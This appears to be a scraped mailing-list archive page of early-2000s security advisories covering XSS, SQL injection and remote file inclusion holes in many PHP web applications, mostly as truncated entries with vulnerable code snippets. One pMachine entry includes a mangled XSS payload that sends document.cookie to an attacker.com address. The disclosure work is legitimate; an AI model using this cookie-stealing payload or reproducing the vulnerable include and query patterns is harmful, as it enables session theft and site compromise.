Informations :
°
Language : PHP
Bugged Versions : 1.3.x and less (+ 2.0.x and less ? not checked)
Safe Version : 2.0.3
Website : http://www.xoops.org
Problem : BBcode XSS
PHP Code/Location :
°°°
This hole can be used in modules :
- Private Messages
- News
- NewBB
Informations :
°
Language : PHP
Version : Free 2.2.1
Website : http://www.pmachine.com
Problem : Include() Security Hole
PHP Code/Location :
°°°
This will work if register_globals is ON *OR* OFF.
/pm/lib.inc.php :
I haven't tested but I don't think addslashes() is a good solution here.
The same javascript can be executed without ' or , like this :
lt;name=alt;input type=hidden name=u
value=http://www.attacker.com/prova.phplt;/form
lt;scriptwindow.open(document.a.u.value+document.cookie)lt;/script
What do
Informations :
°°
Language : PHP
Website : http://www.phpnuke.org
Version : 6.0 6.5 RC2
Modules : Forums, Private_Messages
Problem : SQL Injection
PHP Code/Location :
°°°
/modules/Forums/viewtopic.php :
Informations :
°°
Language : PHP
Website : http://www.phpnuke.org
Versions : 6.0 ( 6.5?)
Modules : Members_List, Your_Account
Problem : SQL Injection
PHP Configuration : This will work if magic_quotes_gpc=OFF.
PHP Code/Location :
°°°
/modules/Members_List/index.php :
Informations :
°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Informations Disclosure (Admin Password)
- File Including
PHP Code/Location :
°°°
password.inc :
?
$globalpw = [PASSWORD];
?
index.php :
Informations :
°°
Website : http://www.invisionboard.com
--
Version : 1.0.1
Problem : phpinfo()
--
Version : 1.1.1
Problem : File Including
PHP Code/Location :
°°°
v1.0.1 :
phpinfo.php :
--
?php
phpinfo();
?
Informations :
°°
Version : 3.0
Website : http://www.tefonline.net/
Problems :
- XSS - admin infos recovery
- Access to admin pages
PHP Code/Location :
°°°
If pseudo = [SCRIPT],
e-mail = [SCRIPT]
or message = /textarea[SCRIPT]
[SCRIPT] will be executed on index.php,
Informations :
°°
Website : http://www.hp-planet.de
Version : 1
Problem : Informations disclosure
PHP Code/Location :
°°°
login.php :
-
function passwd2($user)
{
$password=nicht registriert;
if (file_exists(user/.$user..txt))
Informations :
°°
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Informations disclosure
- System commands execution
PHP Code/Location :
°°°
foo.php3 :
-
? phpinfo(); ?
-
config.inc :
- SQL password
- SQL
Informations :
°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 - 1.11
Problem : Include file
PHP Code/Location :
°°°
/includes/header.php3 :
---
?php
if ($my_header!=)
{
include ($my_header);
} else {
?
...
Informations :
°°
Version : 1.00
Website : http://www.pc-encheres.com
Problem : SQL Injection
PHP Code/Location :
°°°
compte.php :
---
?
session_start();
if (isset($achat))
{
session_register(achat);
}
Informations :
°°
Version : 0.4.3-1
Website : http://myphppagetool.sourceforge.net/
Problem : Include file
PHP Code/Location :
°°°
In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php,
help4.php, help5.php, help6.php, help7.php, help8.php and
A non-official patch has been created for this hole and is published on
http://www.phpsecure.org/index.php?zone=pPatchAsAlpha=dl=us (english
version) .
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: dotproject Remote Code Execution Vulnerability
Date: Wed, 29 Jan 2003 04:02:24 -0800
A patch has been created for this hole and can be found on
http://www.phpsecure.org/.
From: MGhz [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Zorum Portal (PHP)
Date: 22 Jan 2003 19:45:26 -
Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file
Informations :
°°
Website : http://www.plansbiz.net
Version : 3.5 GOLD
Problems : File copy/upload
PHP Code/Location :
°°°
room/save_item.php :
if($name == OR $ref == ){
echo You are fogot enter
Informations :
°°
Version : 2
Website : http://www.agames-net.com
Problem : SQL Injection
PHP Code/Location :
°°°
accesscontrol.php :
[...]
session_register(uid);
session_register(pwd);
[...]
$sql = SELECT * FROM user
Informations :
°°
---
Product : vAuthenticate
Version : 2.8
---
Product : vSignup
Version : 2.1
---
Website : http://www.beanbug.net
Problem : SQL Injection
PHP Code/Location :
°°°
chgpwd.php :
Informations :
°°
Version : ?
Website : http://www.theni.freesurf.fr
Problems :
- Include file
- phpinfo()
PHP Code/Location :
°°°
/admin_t/include/aff_liste_langue.php :
-
require ($rep_include.para_langue.php);
Informations :
°°
Product : OpenTopic
Website : http://www.infopop.com
Version : 2.3.1
Problem : XSS (script injection) - Cookies recovery
Location/Exploit :
°°
The XSS hole is in the private messages area (
http://[target]/OpenTopic?a=ugtpc ).
XSS to get cookie :
Informations :
°°
Website : http://nxwcms.sourceforge.net/
Version : 2002 PreRelease 1
Problem : Include file
PHP Code/Location :
°°°
nx/common/cds/menu.inc.php :
---
[...]
require_once
Informations :
°°
Version : 1.0b
Website : http://www.mapetite-entreprise.com
Problem : Include file
PHP Code/Location :
°°°
modeles/haut.php :
---
?
$langfile = $dirroot./lang/.$SESSION[lang]./lang.php;
require
Informations :
°°
Version : ? - 3.0.1
Website : http://www.scripts-php-gratuits.com
Problem : SQL Injection - Access to member's accounts
PHP Code/Location :
°°°
modif/ident.php :
--
[...]
$sql=SELECT nomsite FROM
Informations :
°°
Website : http://www.phpcodeur.net
Versions : 2.0beta - 2.1.0
Problem : Include file
PHP Code/Location :
°°°
newsletter.php 2.1beta - 2.1.0 :
if( !empty($HTTP_POST_VARS['action']) )
{
$action =
Informations :
°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS
Developpement :
°°°
The majority of the PHPNuke's files are includes in modules.php or
index.php. To prevent the direct access, PHPNuke made two kinds
PHPSecure made some patchs for security holes in PHP products.
Here is the list :
- ALP - Banner Ad 2.0 :
http://www.phpsecure.org/index.php?id=1zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=ALP
- Tight Auction 3.0 :
Informations :
°°
Website : http://www.myphpsoft.net
Version : ? - 2.1.9, 2.2.0CVS
Problem : SQL Injection - Admin access
PHP Code/Location :
°°°
admin/auth/checksession.php
---
[...]
if($idsession!=''){
$dbs
Anything about UPB was already wrote (1.1 1.0beta) :
http://www.frogsecure.com/tutos/UPB.txt
From: euronymous [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: XSS and Path Disclosure in UPB
Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK)
Informations :
°°
Versions : ? - 0.3 - 0.5.3
Website : http://www.thatware.org
Problems :
- Include file
- SQL Injection
PHP Code/Location :
°°°
artlist.php (v0.5.2, 0.5.3) :
-
include $root_path.'thatfile.php';
Informations :
°°
Problem : Include files
a) ---
Product : Freenews
Version : 2.1
Website : http://www.prologin.fr
--
b) ---
Product : News Evolution
Versions : 1.0, 2.0
Website : http://www.phpevolution.net
--
Informations :
°°
Version, Website : ?
Problems :
- phpinfo()
- SQL Injection
PHP Code/Location :
°°°
agentadmin.php :
--
[...]
} elseif ($agentname != OR $current_user != )
{
$sql = SELECT id FROM
Informations :
°°
Website : http://webcreator.com02.com
Tested version : 0.1
Problem : Include file
PHP Code/Location :
°°°
news/include/customize.php :
--
?
$langfile = $l;
include $l;
?
--
index.php :
Informations :
°°
Product : dobermann FORUM
version : 0.5
website : http://www.le-dobermann.com
Problem : Include file
PHP Code/location :
°°°
entete.php
enteteacceuil.php
topic/entete.php :
--
?php include $subpath.banniere.php;
Informations :
°°
Language : PHP
Tested version : 1.4
Problem : Admin access
PHP Code :
°°
/gb/index.php :
--
?php
include(config.inc.php);
if($action == login) {
if($user == $loginu $pw == $loginpw)
{
setcookie(login,
Informations :
°°
Language : PHP
Tested version : 1
Problem : bad use of include()
PHP Code :
°°
---Include/variables.php3---
?
$Mac=localhost;
$Uti=root;
$Mot=;
$Bd=phpnews;
$AnneeDeDemarrage=2000;
$MoisDeDemarrage=8;
$NbNouvelles=5;
require($Include/french.inc);
?
Informations :
°°
Product : SSGbook
Langage : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting
PHP Code / location :
°
- config.asp --
fString = doCode(fString, [img],[/img],img src=,
1)
Informations :
°°
Product : phpSecurePages
Tested version : 0.27b
Website : http://www.phpsecurepages.f2s.com
Problem : include file
PHP Code :
°°
-- checklogin.php -
if (!$login) {
// no login available
include($cfgProgDir .
Informations :
°°
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file
PHP code :
°°
/include/customize.php
?
$langfile = $l;
include $l;
?
/include/customize.php
Exploit :
I sent this three times to webappsec but without resultats.
I try so on bugtraq, although that is less appropriate.
-
Five products in PHP are vulnerable to various holes.
1) TightAuction
Website : http://www.tightprices.com
Tested Version :
Informations :
°°
Language : PHP
Tested version : 1
Website : ?
Comment : Very simple code.
a) Writing PHP code in a PHP file and execution of this code.
Problem :
°
- users.php -
?
$fp=fopen(news.php3,a);
fwrite($fp,Posté Par [$LOGIN]\n);
40 matches
Mail list logo
